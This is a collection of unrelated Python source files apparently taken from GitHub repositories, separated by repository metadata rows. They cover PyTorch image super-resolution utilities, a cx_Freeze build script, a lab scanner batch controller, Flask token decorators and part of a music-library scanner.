layer.weight.data = collapse_weight[nameIn+'_prelu']
continue
elif isinstance(layer, MaskUnit):
for name, layer in layer.named_children():
if isinstance(layer, nn.Conv2d):
layer.weight.data = collapse_weight[nameIn+'_mask_weight']
layer.bias.data = collapse_bias[nameIn+'_mask_bias']
continue
else:
if isinstance(layer, nn.Conv2d):
layer.weight.data = collapse_weight[nameIn+'_weight_comb']
if collapse_bias[nameIn+'_bias_comb'] is not None:
layer.bias.data = collapse_bias[nameIn+'_bias_comb']
def space_to_depth(in_tensor, down_scale):
n, c, h, w = in_tensor.size()
unfolded_x = torch.nn.functional.unfold(in_tensor, down_scale, stride=down_scale)
return unfolded_x.view(n, c * down_scale ** 2, h // down_scale, w // down_scale)
def getMask_simple(x,scale,training):
n, c, h, w = x.shape
x_down = F.interpolate(x, (h//scale, w//scale), mode='bicubic', align_corners=False)
x_up = F.interpolate(x_down, (h, w), mode='bicubic', align_corners=False)
img_mae = torch.abs(x - x_up)
img_mae = img_mae.view(n,c,-1)
img_mae = torch.mean(img_mae, 1, keepdim=True)
img_median = torch.median(img_mae, dim=2, keepdim=True)
mask = (img_mae > img_median[0]).view(n,1,h,w)
return mask
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def generate_idx(a,ori):
A = torch.arange(3).view(-1, 1, 1)
mask_indices = torch.nonzero(a.squeeze())
# indices: dense to sparse (1x1)
h_idx_1x1 = mask_indices[:, 0]
w_idx_1x1 = mask_indices[:, 1]
# indices: dense to sparse (3x3)
mask_indices_repeat = mask_indices.unsqueeze(0).repeat([3, 1, 1]) + A
h_idx_3x3 = mask_indices_repeat[..., 0].repeat(1, 3).view(-1)
w_idx_3x3 = mask_indices_repeat[..., 1].repeat(3, 1).view(-1)
# indices: sparse to sparse (3x3)
indices = torch.arange(float(mask_indices.size(0))).view(1, -1).to(a.device) + 1
a[0, 0, h_idx_1x1, w_idx_1x1] = indices
idx_s2s = F.pad(a, [1, 1, 1, 1])[0, :, h_idx_3x3, w_idx_3x3].view(9, -1).long()
pick = F.pad(ori, [1, 1, 1, 1])[0, :, h_idx_3x3, w_idx_3x3].view(9 * ori.size(1), -1)
return pick,h_idx_1x1,w_idx_1x1
def sparse_conv(ori, pick, k, h_idx_1x1, w_idx_1x1):
conv3x3 = nn.Conv2d(1,3,k,padding=k//2)
kernel = conv3x3.weight.data.view(3, -1)
sparse_out = torch.mm(kernel, pick)
ori = ori.repeat((1,3,1,1))
ori[0, :, h_idx_1x1, w_idx_1x1] = sparse_out
return ori
import numpy as np
from PIL import Image
from scipy.signal import convolve2d
def matlab_style_gauss2D(shape=(3,3),sigma=0.5):
"""
2D gaussian mask - should give the same result as MATLAB's
fspecial('gaussian',[shape],[sigma])
"""
m,n = [(ss-1.)/2. for ss in shape]
y,x = np.ogrid[-m:m+1,-n:n+1]
h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )
h[ h < np.finfo(h.dtype).eps*h.max() ] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
return h
def filter2(x, kernel, mode='same'):
return convolve2d(x, np.rot90(kernel, 2), mode=mode)
def compute_ssim(im1, im2, k1=0.01, k2=0.03, win_size=11, L=255):
if not im1.shape == im2.shape:
raise ValueError("Input Imagees must have the same dimensions")
if len(im1.shape) > 2:
raise ValueError("Please input the images with 1 channel")
M, N = im1.shape
C1 = (k1*L)**2
C2 = (k2*L)**2
window = matlab_style_gauss2D(shape=(win_size,win_size), sigma=1.5)
window = window/np.sum(np.sum(window))
if im1.dtype == np.uint8:
im1 = np.double(im1)
if im2.dtype == np.uint8:
im2 = np.double(im2)
mu1 = filter2(im1, window, 'valid')
mu2 = filter2(im2, window, 'valid')
mu1_sq = mu1 * mu1
mu2_sq = mu2 * mu2
mu1_mu2 = mu1 * mu2
sigma1_sq = filter2(im1*im1, window, 'valid') - mu1_sq
sigma2_sq = filter2(im2*im2, window, 'valid') - mu2_sq
sigmal2 = filter2(im1*im2, window, 'valid') - mu1_mu2
ssim_map = ((2*mu1_mu2+C1) * (2*sigmal2+C2)) / ((mu1_sq+mu2_sq+C1) * (sigma1_sq+sigma2_sq+C2))
return np.mean(np.mean(ssim_map))
def collapse_2layer(f1,f1b,f2,f2b):
weight_tmp = f1
new_bias = f1b
weight3 = f2
bias3 = f2b
weight_tmp_ = weight_tmp.view(weight_tmp.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3))
weight3_ = weight3.view(weight3.size(0), weight3.size(1) * weight3.size(2) * weight3.size(3))
new_weight_ = torch.Tensor(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2)*weight_tmp.size(3)).to('cuda')
for i in range(weight_tmp.size(1)):
tmp = weight_tmp_[:, i, :].view(weight_tmp.size(0), weight_tmp.size(2) * weight_tmp.size(3))
new_weight_[:, i, :] = torch.matmul(weight3_, tmp)
weight_combi = new_weight_.view(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2), weight_tmp.size(3))
# weight_combi = torch.matmul(weight3_tmp, weight_tmp_tmp).view((weight3.shape[0],weight_tmp.shape[1],weight_tmp.shape[2],weight_tmp.shape[3]))
bia1_combi = None
# bias merge
if new_bias is not None:
bia1_combi = torch.matmul(weight3.view((weight3.shape[0], weight3.shape[1], -1)).sum(2), new_bias) + bias3
weight_collapse = weight_combi
return weight_collapse, bia1_combi
def collapse_CollapseLayer(f1,f1b,f2,f2b,f3,f3b):
weight1 = f1
bias1 = f1b
weight2 = f2
bias2 = f2b
weight3 = f3
bias3 = f3b
w_s_2_tmp = weight2.view(weight2.size(0), weight2.size(1), weight2.size(2) * weight2.size(3))
if bias1 is not None and bias2 is not None:
b_sum = torch.sum(w_s_2_tmp, dim=2)
new_bias = torch.matmul(b_sum, bias1) + bias2
elif bias1 is None:
new_bias = bias2 #without Bias
else:
new_bias = None
weight_tmp = F.conv_transpose2d(weight2, weight1)
# weight merge
# weight_tmp = weight_tmp.view((weight_tmp.shape[0], -1))
# weight3 = weight3.view((weight3.shape[0], -1))
weight_tmp_ = weight_tmp.view(weight_tmp.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3))
weight3_ = weight3.view(weight3.size(0), weight3.size(1) * weight3.size(2) * weight3.size(3))
new_weight_ = torch.Tensor(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2)*weight_tmp.size(3)).to('cuda')
for i in range(weight_tmp.size(1)):
tmp = weight_tmp_[:, i, :].view(weight_tmp.size(0), weight_tmp.size(2) * weight_tmp.size(3))
new_weight_[:, i, :] = torch.matmul(weight3_, tmp)
weight_combi = new_weight_.view(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2), weight_tmp.size(3))
# weight_combi = torch.matmul(weight3_tmp, weight_tmp_tmp).view((weight3.shape[0],weight_tmp.shape[1],weight_tmp.shape[2],weight_tmp.shape[3]))
bia1_combi = None
# bias merge
if bias1 is not None:
bia1_combi = torch.matmul(weight3.view((weight3.shape[0], weight3.shape[1], -1)).sum(2), new_bias) + bias3
weight_collapse = weight_combi
return weight_collapse, bia1_combi
def collapse_Skip(weight_tmp,new_bias,f3,f3b, residual=False):
weight3 = f3
bias3 = f3b
# weight merge
weight_tmp_ = weight_tmp.view(weight_tmp.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3))
weight3_ = weight3.view(weight3.size(0), weight3.size(1) * weight3.size(2) * weight3.size(3))
new_weight_ = torch.Tensor(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2)*weight_tmp.size(3)).to('cuda')
for i in range(weight_tmp.size(1)):
tmp = weight_tmp_[:, i, :].view(weight_tmp.size(0), weight_tmp.size(2) * weight_tmp.size(3))
new_weight_[:, i, :] = torch.matmul(weight3_, tmp)
weight_combi = new_weight_.view(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2), weight_tmp.size(3))
if new_bias is not None and bias3 is not None:
new_bias = torch.matmul(weight3_, new_bias) + bias3 # with bias
elif new_bias is None:
new_bias = bias3 #without Bias
else:
new_bias = None
# weight_combi = torch.matmul(weight3_tmp, weight_tmp_tmp).view((weight3.shape[0],weight_tmp.shape[1],weight_tmp.shape[2],weight_tmp.shape[3]))
bia1_combi = new_bias
weight_collapse = weight_combi
if residual:
# residual merge
outDims, kernel_size = weight_combi.shape[0],weight_combi.shape[3]
weight_residual = torch.zeros(weight_combi.shape).cuda()
if kernel_size == 3:
idx = 1
if kernel_size == 5:
idx = 2
for i in range(outDims):
weight_residual[i,i,idx,idx] = 1
# residual combi
weight_collapse = weight_residual + weight_combi
else:
weight_collapse = weight_combi
return weight_collapse, bia1_combi
def time_test(net, input, device, isMeta=False, meta=None, prior=None):
if device == 'cuda':
if isMeta:
torch.cuda.synchronize()
tik = time.time()
pre_y,_ = net((input, meta, prior))
torch.cuda.synchronize()
tok = time.time() - tik
else:
torch.cuda.synchronize()
tik = time.time()
pre_y = net(input)
torch.cuda.synchronize()
tok = time.time() - tik
else :
if isMeta:
tik = time.time()
pre_y,_ = net((input, meta, prior))
tok = time.time() - tik
else:
tik = time.time()
pre_y = net(input)
tok = time.time() - tik
return pre_y,tok
def remove_prefix(state_dict_):
state_dict = {}
for key in state_dict_:
if key.startswith('module') and not key.startswith('module_list'):
state_dict[key[7:]] = state_dict_[key]
else:
state_dict[key] = state_dict_[key]
return state_dict
class GradualWarmupScheduler(_LRScheduler):
""" Gradually warm-up(increasing) learning rate in optimizer.
Proposed in 'Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour'.
Args:
optimizer (Optimizer): Wrapped optimizer.
multiplier: target learning rate = base lr * multiplier if multiplier > 1.0. if multiplier = 1.0, lr starts from 0 and ends up with the base_lr.
total_epoch: target learning rate is reached at total_epoch, gradually
after_scheduler: after target_epoch, use this scheduler(eg. ReduceLROnPlateau)
"""
def __init__(self, optimizer, multiplier, total_epoch, after_scheduler=None):
self.multiplier = multiplier
if self.multiplier < 1.:
raise ValueError('multiplier should be greater thant or equal to 1.')
self.total_epoch = total_epoch
self.after_scheduler = after_scheduler
self.finished = False
super(GradualWarmupScheduler, self).__init__(optimizer)
def get_lr(self):
if self.last_epoch > self.total_epoch:
if self.after_scheduler:
if not self.finished:
self.after_scheduler.base_lrs = [base_lr * self.multiplier for base_lr in self.base_lrs]
self.finished = True
return self.after_scheduler.get_last_lr()
return [base_lr * self.multiplier for base_lr in self.base_lrs]
if self.multiplier == 1.0:
return [base_lr * (float(self.last_epoch) / self.total_epoch) for base_lr in self.base_lrs]
else:
return [base_lr * ((self.multiplier - 1.) * self.last_epoch / self.total_epoch + 1.) for base_lr in self.base_lrs]
def step_ReduceLROnPlateau(self, metrics, epoch=None):
if epoch is None:
epoch = self.last_epoch + 1
self.last_epoch = epoch if epoch != 0 else 1 # ReduceLROnPlateau is called at the end of epoch, whereas others are called at beginning
if self.last_epoch <= self.total_epoch:
warmup_lr = [base_lr * ((self.multiplier - 1.) * self.last_epoch / self.total_epoch + 1.) for base_lr in self.base_lrs]
for param_group, lr in zip(self.optimizer.param_groups, warmup_lr):
param_group['lr'] = lr
else:
if epoch is None:
self.after_scheduler.step(metrics, None)
else:
self.after_scheduler.step(metrics, epoch - self.total_epoch)
def step(self, epoch=None, metrics=None):
if type(self.after_scheduler) != ReduceLROnPlateau:
if self.finished and self.after_scheduler:
if epoch is None:
self.after_scheduler.step(None)
else:
self.after_scheduler.step(epoch - self.total_epoch)
self._last_lr = self.after_scheduler.get_last_lr()
else:
return super(GradualWarmupScheduler, self).step(epoch)
else:
self.step_ReduceLROnPlateau(metrics, epoch)
def reduce_tensor(tensor, world_size):
rt = tensor.clone()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
rt /= world_size
return rt
if __name__ == "__main__":
im1 = Image.open("1.png")
im2 = Image.open("2.png")
print(compute_ssim(np.array(im1),np.array(im2)))
| Lumos-Leo/SRGFS_test | Utils/CommonUtils.py | CommonUtils.py | py | 29,482 | python | en | code | 0 | github-code | 50 |
10185777640 | from cx_Freeze import setup, Executable
options = dict(
excludes =
['_gtkagg', '_tkagg', 'bsddb', 'email', 'pywin.debugger',
'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl',
'Tkconstants', 'Tkinter','tk','tkinter','ttk','curses','email',
],
)
exe = Executable(
script="pylans-launcher.py",
initScript = None,
base = None,
# targetDir = r"cxdist",
targetName = "pylans.exe",
compress = True,
# copyDependentFiles = True,
appendScriptToExe = False,
appendScriptToLibrary = False,
icon = None
)
setup(
name = "pylans!",
version = "0.0.2",
author = 'Brian Parma',
description = "Python p2p VPN Tunnel",
executables = [exe],
options = {'build_exe': options},
)
| bj0/pylans | cxfsetup.py | cxfsetup.py | py | 799 | python | en | code | 6 | github-code | 50 |
34873217783 | #!/usr/bin/env python2
# -*- coding:utf-8 -*-
"""
[NAME]
Scannerクラスの定義
[DESCRIPTION]
Scannerクラスの定義
"""
import datetime
from schema import Scanner, Person, Exp
def start_batch(batch):
dt_start = datetime.datetime.now()
dt_measure = datetime.timedelta(hours=batch.h_scan)
dt_finish = dt_start + dt_measure
person = Person(batch.person_id)
sid2exp_ids = {}
for pos2exp_id in batch.pos2exp_id.split("|"):
pos, exp_id = pos2exp_id.split(":")
sid, sind = map(int, pos.split("-"))
if sid not in sid2exp_ids.keys():
sid2exp_ids[sid] = []
sid2exp_ids[sid] += [exp_id]
exp = Exp(int(exp_id))
exp.dt_start = dt_start
exp.update()
for sid, exp_ids in sid2exp_ids.items():
exp_ids_str = "|".join(exp_ids)
#for item in batch.poss_assig.split(","):
#scanner_id, exp_ids = item.split("-")
#scanner = Scanner(scanner_id)
scanner = Scanner(sid)
scanner.batch_id = batch.id
scanner.person_name = person.name
scanner.dt_start = dt_start
scanner.dt_finish = dt_finish
scanner.exp_ids = exp_ids_str
scanner.update()
batch.dt_start = dt_start
batch.status = "monitoring"
batch.update()
def cancel_batch(batch):
sids = list(set([int(i.split(":")[0].split("-")[0])
for i in batch.pos2exp_id.split("|")]))
for sid in sids:
scanner = Scanner(sid)
scanner.clean()
batch.status = "waiting the experiment"
batch.update()
def abort_batch(batch):
sids = list(set([int(i.split(":")[0].split("-")[0])
for i in batch.pos2exp_id.split("|")]))
for sid in sids:
scanner = Scanner(sid)
scanner.dt_finish = datetime.datetime.now() # 終了時刻を押した時刻にする
scanner.update()
batch.status = "Done"
batch.update()
if __name__ == "__main__":
pass
| takeriki/colonylive | clive/db/control.py | control.py | py | 1,971 | python | en | code | 0 | github-code | 50 |
30210939337 | # coding=utf-8
import ast
from app import app, db
from flask import request
from functools import wraps
from app.api.utils.utils import BaseUtils
from app.models.base_token import BaseToken
from app.models.base_customer import BaseCustomer
from app.api.utils.responses import BaseResponse
class BaseDecorator(object):
""" Base View to Decorators common to all Webservices.
"""
def __init__(self):
"""Constructor
"""
pass
def validate_token(f):
@wraps(f)
def decorated(*args, **kwargs):
data = BaseUtils.get_data(request=request)
response = BaseResponse(base_customer=data['base_customer'], data=data)
try:
query_token = db.session.query(BaseToken) \
.filter(
BaseToken.api_token == data["access_token"],
BaseToken.status == True
).first()
except:
return response.permission_denied()
if query_token:
if query_token.base_customer != data['base_customer']:
return response.permission_denied()
return f(data['base_customer'], *args, **kwargs)
return response.permission_denied()
return decorated
def validate_token_system(f):
@wraps(f)
def decorated(*args, **kwargs):
data = BaseUtils.get_data(request=request)
response = BaseResponse(base_customer=data['base_customer'], data=data)
try:
query_user = db.session.query(BaseCustomer.id) \
.filter(
BaseCustomer.id == data['base_customer'],
).first()
except:
return response.server_error()
if not query_user:
return response.permission_denied()
if data['access_token'] == app.config['SECRET_KEY']:
return f(query_user.id, *args, **kwargs)
return response.permission_denied()
return decorated
def system(f):
@wraps(f)
def decorated(*args, **kwargs):
data = BaseUtils.get_data(request=request)
response = BaseResponse(base_customer=data['base_customer'], data=data)
if data["method"] in('PUT'):
if not data["id"]:
return response.permission_denied()
if not data["base_customer"]:
return response.base_customer_is_missing()
if not data["access_token"]:
return response.token_is_missing()
return f(data, *args, **kwargs)
return decorated | IndexOffy/indexoffy_api | indexoffy/app/api/utils/decorators.py | decorators.py | py | 2,831 | python | en | code | 0 | github-code | 50 |
22439653082 | import numpy as np # Numerical Python functions
#GGCACTGAACTGAATACAGC is our sequence: A,C,G,T=0,1,2,3
Seq = [2,2,1,0,1,3,2,0,0,1,3,2,0,1,3,3,0,1,0,2,1] #Sequence
HLSeq = np.zeros((len(Seq),2)) #Store optimal sequences as we progress
HLSeq[:,1] += 1 #Defaults are all low, all high
Hi = [.2,.3,.3,.2] #Probabilities for nucleotides in High state
Lo = [.3,.2,.2,.3] #Probabilities for nucleotides in Low state
HLT = [[.5,.5],[.4,.6]] #Matrix of transition probabilities between High&Low states
currProb = np.array([.5*Hi[Seq[0]],.5*Lo[Seq[0]]]) #Stores current H&L probabilities
currProb = currProb.reshape(2,1) #change to 2X1 matrix
Prob = [[1,1],[1,1]] #Stores all 4 calculated probabilities at each stage
##### Compute trellis
for k in range(1,len(Seq)):
HiLo = np.array( [Hi[Seq[k]],Lo[Seq[k]]] ) #Current nucleotide probabilities in H&L
HiLo = HiLo.reshape(1,2) #change to a 1X2 matrix
Prob = (currProb@HiLo)*HLT #matrix mult. between currProb and HiLo, then item by item mult. by HLT
currProb[0,0],currProb[1,0] = Prob[0,0],Prob[1,1] #set initial currProb
if Prob[1,0]> Prob[0,0]: #Update sequence ending in 0; switch if necessary
HLSeq[0:k,0] = HLSeq[0:k,1]
currProb[0,0] = Prob[1,0]
if Prob[0,1] > Prob[1,1]: #Update sequence ending in 0; switch if necessary
HLSeq[0:k,1] = HLSeq[0:k,0]
currProb[1,0] = Prob[0,1]
##### Finished: choose optimal from final two options
if currProb[0,0] >= currProb[1,0]:
FinalSeq = HLSeq[:,0] #High/Low states history ending with 0
else:
FinalSeq = HLSeq[:,1] #High/Low states history ending with 1
FinalSeq = list(FinalSeq)
for k in range(0,len(Seq)):
if FinalSeq[k]==0:
FinalSeq[k]="High"
else:
FinalSeq[k]="Low"
print(FinalSeq)
| chuks-ojiugwo/Implementations-and-Applications-of-Machine-Learning | LaverBrandtThronBudget Reconciliation Through Dynamic Programming/Matrix Gonze-Viterbi.py | Matrix Gonze-Viterbi.py | py | 1,792 | python | en | code | 0 | github-code | 50 |
551370559 | from typing import List, Dict
import string
import re
from collections import Counter
from wordcloud import WordCloud
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer, PorterStemmer
from nltk.tokenize import word_tokenize
class WordCloudGenerator:
"""Generates a word cloud from a given text or file path."""
def __init__(self, text: str = None, file_path: str = None) -> None:
"""
Constructor for the WordCloudGenerator class.
Args:
text (str, optional): The text to be used for generating the word cloud.
file_path (str, optional): The path to the text file to be used for generating the word cloud.
"""
if text is not None:
self.text = text
elif file_path is not None:
with open(file_path, 'r') as f:
self.text = f.read()
def clean_text(self, text: str=None) -> str:
"""
Cleans the input text by removing special characters and stop words, and performing stemming and lemmatization.
Args:
text (str): The text to be cleaned.
Returns:
str: The cleaned text.
"""
if text is None:
text = self.text
stop_words = set(stopwords.words('english'))
wordnet_lemmatizer = WordNetLemmatizer()
porter_stemmer = PorterStemmer()
# remove punctuation and convert to lowercase
text = text.translate(str.maketrans('', '', string.punctuation)).lower()
# remove stopwords and lemmatize/stem the words
words = word_tokenize(text)
words = [porter_stemmer.stem(wordnet_lemmatizer.lemmatize(word, pos='v'))
for word in words if word not in stop_words]
# return cleaned text as string
return ' '.join(words)
def get_word_counts(self, text: str=None) -> Dict[str, int]:
"""
Counts the frequency of each word in the input text.
Args:
text (str): The text to be analyzed.
Returns:
dict: A dictionary containing the word counts.
"""
if text is None:
text = self.text
words = self.clean_text(text).split()
return dict(Counter(words))
def get_top_n_words(self, text: str=None, n: int=1) -> List[str]:
"""
Returns the n most frequent words in the input text.
Args:
text (str): The text to be analyzed.
n (int): The number of top words to return.
Returns:
list: A list containing the n most frequent words.
"""
if text is None:
text = self.text
word_counts = self.get_word_counts(text)
return [word for word, count in sorted(word_counts.items(), key=lambda item: item[1], reverse=True)[:n]]
def get_word_frequencies(self, text: str=None) -> Dict[str, float]:
"""
Calculates the frequency of each word in the input text.
Args:
text (str): The text to be analyzed.
Returns:
dict: A dictionary containing the word frequencies.
"""
if text is None:
text = self.text
words = self.clean_text(text).split()
word_counts = Counter(words)
total_words = sum(word_counts.values())
return {word: count / total_words for word, count in word_counts.items()}
def get_word_cloud_image(self, text: str=None, mask_image: np.ndarray = None) -> Image.Image:
"""
Generates a word cloud image from the input text.
Args:
text (str): The text to be analyzed.
mask_image (np.ndarray, optional): A mask image to use for the word cloud.
Returns:
Image.Image: The generated word cloud image.
"""
if text is None:
text = self.text
word_frequencies = self.get_word_frequencies(text)
word_cloud = WordCloud(width=800, height=400, background_color='white', mask=mask_image).generate_from_frequencies(word_frequencies)
return word_cloud.to_image()
def plot_word_cloud(self, text: str=None, mask_image: np.ndarray = None) -> None:
"""
Plots a word cloud image from the input text.
Args:
text (str): The text to be analyzed.
mask_image (np.ndarray, optional): A mask image to use for the word cloud.
"""
if text is None:
text = self.text
word_cloud_image = self.get_word_cloud_image(text, mask_image)
plt.imshow(word_cloud_image)
plt.axis('off')
plt.show()
| guybass/sentiment_analysis | eda.py | eda.py | py | 4,830 | python | en | code | 0 | github-code | 50 |
18696574569 | class Node:
def __init__(self,x):
self.l = None
self.r = None
self.d = x
def Insert(node,x):
if node == None:
return Node(x)
if x<node.d:
node.l = Insert(node.l,x)
else:
node.r = Insert(node.r,x)
return node
def IscompleteBinary(node,i,N):
if node == None:
return True
if i>=N:
return False
return (IscompleteBinary(node.l,2*i+1,N) and IscompleteBinary(node.r,2*i+2,N))
for _ in range(int(input())):
N = int(input())
arr = list(map(int,input().split()))
node = Node(arr[0])
for i in range(1,N):
node = Insert(node,arr[i])
if IscompleteBinary(node,0,N):
print('Yes')
else:
print('No')
| riteshsethia7/Codes | Trees/Is_Complete_Binary_Tree.py | Is_Complete_Binary_Tree.py | py | 751 | python | en | code | 0 | github-code | 50 |
45692922219 | class Solution:
def maxEvents(self,events):
events.sort(key=lambda x:x[1])
visited = set()
for s,e in events:
for day in range(s,e+1):
if day not in visited:
visited.add(day)
break
return len(visited)
| 2448845600/LeetCodeDayDayUp | LeetCode题解/weekly-contest-176/3-id5342.py | 3-id5342.py | py | 305 | python | en | code | 4 | github-code | 50 |
4053207217 | # -*- coding: utf-8 -*-
"""
Listing 10-3. PLANCKSSOLARSPECTRUM
"""
import numpy as np, matplotlib.pyplot as plt
plt.close('all')
plt.axis([0,3,0,100])
plt.xlabel('Wavelength $\lambda$ ($\mu$m)')
plt.ylabel('S($\lambda$) (MW/m$^{3}$) x 10^-6')
plt.grid(True)
plt.title('Max Plancks Solar Spectrum')
c=2.9979*(10.**8) #m/s - speed of light in a vacuum
h=6.63*(10.**-34) #Js - Planck's constant
kb=1.38*(10**-23) #J/K - Boltzmann's constant
e=.985 #emissivity
t=5800.
e=.984
lamin=.01*10**-6
lamax=10.*10**-6
dla=.01*10**-6
st=0.
for la in np.arange(lamin,lamax,dla):
a1=2.*np.pi*c*c*h/(la**5.)
a2=h*c/(la*kb*t)
sl=e*a1/(np.exp(a2)-1.)
sl=sl*10**-6
st=st+sl*dla #calculate area under the slcurve MW/m^2
slg=sl*10**-6 #scale to plot
lag=la*10**6
plt.scatter(lag,slg,s=1,color='r')
ds=1.39*10**9 #suns diameter m
spas=np.pi*ds**2. #suns spherical area m2
to=spas*st #suns total output MW
to=to*10**6 # W
plt.text(.8,58.,'5800')
plt.text(1.05,58, '$^{\circ}$K')
plt.plot([.39,.39],[-0.,100.],'b--')
plt.plot([.7,.7],[-0.,100.],'b--')
plt.text(.3,-10,'.390')
plt.text(.6,-10,'.700')
plt.text(.15,90.,'UV')
plt.text(.8,90.,'long wave infrared')
plt.arrow(1.75,91.,.8,0.,head_width=1.,head_length=.1,color='r')
plt.text(1.2,40.,'total solar output =')
so='%7.3e'% (to)
dd=str(so)
plt.text(2.1,40,dd)
plt.text(2.7,40,'W')
plt.text(1.2,34,'emissivity =')
e=str(e)
plt.text(1.8,34,e)
plt.text(.5,75.,'v')
plt.text(.53,70.,'i')
plt.text(.5,65.,'s')
plt.text(.53,60.,'i')
plt.text(.5,55.,'b')
plt.text(.53,50.,'l')
plt.text(.5,45.,'e')
plt.plot([1.49,1.49],[0.,11.61],color='g')
plt.plot([1.5,1.5],[0.,11.61],color='g')
plt.plot([1.51,1.51],[0.,11.61],color='g')
laband=1.5*10**-6
a1=2.*np.pi*c*c*h/(laband**5.)
a2=h*c/(laband*kb*t)
sband=a1/(np.exp(a2)-1.)
sband=sband*10**-12
pband=sband*dla #MW/sq meter
pband=pband*10**6 #W/sq meter
plt.plot([1.55,1.7],[12.5,15.],color='k')
plt.text(1.72,14.,' p=')
pband='%7.3e'%(pband)
pband=str(pband)
plt.text(1.9,14,pband)
plt.text(2.4,14,'MW/m^2')
plt.arrow(1.35,5,.1,0,head_width=1, head_length=.05, ec='k', fc='k')
plt.arrow(1.65,5,-.1,0,head_width=1, head_length=.05, ec='k', fc='k')
plt.text(.82,4.9,'$\Delta \lambda=.01\mu m$' )
plt.show() | Apress/python-graphics | Chapter 10/Listing 10-3. PLANCKSSOLARSPECTRUM.py | Listing 10-3. PLANCKSSOLARSPECTRUM.py | py | 2,416 | python | en | code | 34 | github-code | 50 |
6896383846 | import os, os.path
import time, mimetypes
import mutagen
from supysonic import config
from supysonic.db import Folder, Artist, Album, Track
def get_mime(ext):
return mimetypes.guess_type('dummy.' + ext, False)[0] or config.get('mimetypes', ext) or 'application/octet-stream'
class Scanner:
def __init__(self, store):
self.__store = store
self.__added_artists = 0
self.__added_albums = 0
self.__added_tracks = 0
self.__deleted_artists = 0
self.__deleted_albums = 0
self.__deleted_tracks = 0
extensions = config.get('base', 'scanner_extensions')
self.__extensions = map(str.lower, extensions.split()) if extensions else None
def scan(self, folder, progress_callback = None):
files = [ os.path.join(root, f) for root, _, fs in os.walk(folder.path.encode('utf8')) for f in fs if self.__is_valid_path(os.path.join(root, f)) ]
total = len(files)
current = 0
for path in files:
self.__scan_file(path, folder)
current += 1
if progress_callback:
progress_callback(current, total)
folder.last_scan = int(time.time())
self.__store.flush()
def prune(self, folder):
for track in [ t for t in self.__store.find(Track, Track.root_folder_id == folder.id) if not self.__is_valid_path(t.path) ]:
self.__store.remove(track)
self.__deleted_tracks += 1
# TODO execute the conditional part on SQL
for album in [ a for a in self.__store.find(Album) if a.tracks.count() == 0 ]:
self.__store.remove(album)
self.__deleted_albums += 1
# TODO execute the conditional part on SQL
for artist in [ a for a in self.__store.find(Artist) if a.albums.count() == 0 ]:
self.__store.remove(artist)
self.__deleted_artists += 1
self.__cleanup_folder(folder)
self.__store.flush()
def check_cover_art(self, folder):
folder.has_cover_art = os.path.isfile(os.path.join(folder.path, 'cover.jpg'))
for f in folder.children:
self.check_cover_art(f)
def __is_valid_path(self, path):
if not os.path.exists(path):
return False
if not self.__extensions:
return True
return os.path.splitext(path)[1][1:].lower() in self.__extensions
def __scan_file(self, path, folder):
tr = self.__store.find(Track, Track.path == path).one()
add = False
if tr:
if not int(os.path.getmtime(path)) > tr.last_modification:
return
tag = self.__try_load_tag(path)
if not tag:
self.__store.remove(tr)
self.__deleted_tracks += 1
return
else:
tag = self.__try_load_tag(path)
if not tag:
return
tr = Track()
tr.path = path
add = True
tr.disc = self.__try_read_tag(tag, 'discnumber', 1, lambda x: int(x[0].split('/')[0]))
tr.number = self.__try_read_tag(tag, 'tracknumber', 1, lambda x: int(x[0].split('/')[0]))
tr.title = self.__try_read_tag(tag, 'title', '')
tr.year = self.__try_read_tag(tag, 'date', None, lambda x: int(x[0].split('-')[0]))
tr.genre = self.__try_read_tag(tag, 'genre')
tr.duration = int(tag.info.length)
if not add:
tr.album = self.__find_album(self.__try_read_tag(tag, 'artist', ''), self.__try_read_tag(tag, 'album', ''))
tr.bitrate = (tag.info.bitrate if hasattr(tag.info, 'bitrate') else int(os.path.getsize(path) * 8 / tag.info.length)) / 1000
tr.content_type = get_mime(os.path.splitext(path)[1][1:])
tr.last_modification = os.path.getmtime(path)
if add:
tralbum = self.__find_album(self.__try_read_tag(tag, 'artist', ''), self.__try_read_tag(tag, 'album', ''))
trfolder = self.__find_folder(path, folder)
# Set the references at the very last as searching for them will cause the added track to be flushed, even if
# it is incomplete, causing not null constraints errors.
tr.album = tralbum
tr.folder = trfolder
tr.root_folder = folder
self.__store.add(tr)
self.__added_tracks += 1
def __find_album(self, artist, album):
ar = self.__find_artist(artist)
al = ar.albums.find(name = album).one()
if al:
return al
al = Album()
al.name = album
al.artist = ar
self.__store.add(al)
self.__added_albums += 1
return al
def __find_artist(self, artist):
ar = self.__store.find(Artist, Artist.name == artist).one()
if ar:
